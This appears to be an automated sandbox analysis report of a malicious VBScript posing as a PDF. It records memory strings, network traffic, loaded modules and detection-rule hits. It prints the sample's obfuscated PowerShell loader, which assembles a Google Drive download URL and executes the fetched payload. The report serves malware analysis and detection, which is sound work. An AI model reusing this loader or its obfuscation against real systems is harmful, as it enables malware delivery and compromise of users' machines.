Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp; String found in memory: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Source: powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp; String found in memory: Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Source: powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp; String found in memory: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistp^
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected:
  GET /uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
  GET /uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: unknown; DNS traffic detected: queries for: drive.google.com
Source: wscript.exe, 00000000.00000003.1387704610.000001F4619B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387163912.000001F4619C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388165251.000001F4619B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388384843.000001F4619BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423874364.000001F461910000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1388165251.000001F46197A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387704610.000001F461952000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d2e5bd3b22e28
Source: wscript.exe, 00000000.00000003.1422798848.000001F45FB00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423724918.000001F45FBB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421782701.000001F45FAF5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmesL
Source: wscript.exe, 00000000.00000003.1422798848.000001F45FB00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423724918.000001F45FBB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421782701.000001F45FAF5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enMG
Source: wscript.exe, 00000000.00000003.1388165251.000001F46197A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387704610.000001F461952000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d2e5bd3b22
Source: powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1544405936.0000026161671000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1544110626.000002615F641000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.micrt.corAut
Source: powershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCB4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_P
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com/download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1544405936.0000026160B8D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 172.217.12.142:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.72.129:443 -> 192.168.2.8:49707 version: TLS 1.2

System Summary

Source: amsi64_6500.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6500, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8790
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. 
Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgReg
Source: U00b7pdf.vbs | Initial sample: Strings found which are bigger than 50
Source: amsi64_6500.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6500, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@6/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Irreplaceableness.Suc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\Miljforstyrrelsen.txt
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: U00b7pdf.vbs | ReversingLabs: Detection: 15%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000002.00000002.1543947591.000002615F61D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdbr source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tr", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Gennemrystet) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") {
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2A00BD pushad ; iretd 2_2_00007FFB4B2A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2A097D push E95B63D0h; ret 2_2_00007FFB4B2A09C9
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
